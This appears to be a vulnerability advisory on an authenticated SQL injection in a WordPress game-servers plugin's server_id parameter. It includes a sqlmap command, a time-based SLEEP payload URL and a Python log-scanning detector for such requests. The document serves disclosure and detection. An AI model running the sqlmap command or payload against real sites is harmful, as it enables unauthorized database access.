The plugin does not validate or escape the server_id parameter before using it in a SQL statement, leading to an authenticated SQL injection in an admin page.
sqlmap -u "https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1" -p server_id --dbms mysql --cookie [your cookie]
https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
2021-09-21 (about 9 months ago)
2021-09-21 (about 9 months ago)
2022-04-10 (about 2 months ago)
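For detection, requests to this admin page can be checked for a server_id value that is not a plain integer. The sketch below is an added example, not part of the advisory or the plugin; it assumes combined-format web server access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin page slug and parameter name as given in the advisory.
PAGE_SLUG = "grohsfabian-add-game-servers"
PARAM = "server_id"

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_server_id(log_line):
    """Return the decoded server_id if it is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs percent-decodes and maps '+' to space, so both encodings
    # of the same value are compared in one normalised form.
    query = parse_qs(parts.query)
    if PAGE_SLUG not in query.get("page", []):
        return None
    for value in query.get(PARAM, []):
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_server_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Apr/2022:10:00:09 +0000] "GET /wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Apr/2022:10:00:17 +0000] "GET /wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1%20OR%20%28SELECT%2042%20FROM%20%28SELECT%28SLEEP%285%29%29%29b%29 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Apr/2022:10:00:20 +0000] "GET /wp-admin/admin.php?page=other-plugin&server_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer {PARAM}: {value!r}")
```

Because the injection is authenticated, hits from this check are worth correlating with the admin session that issued them.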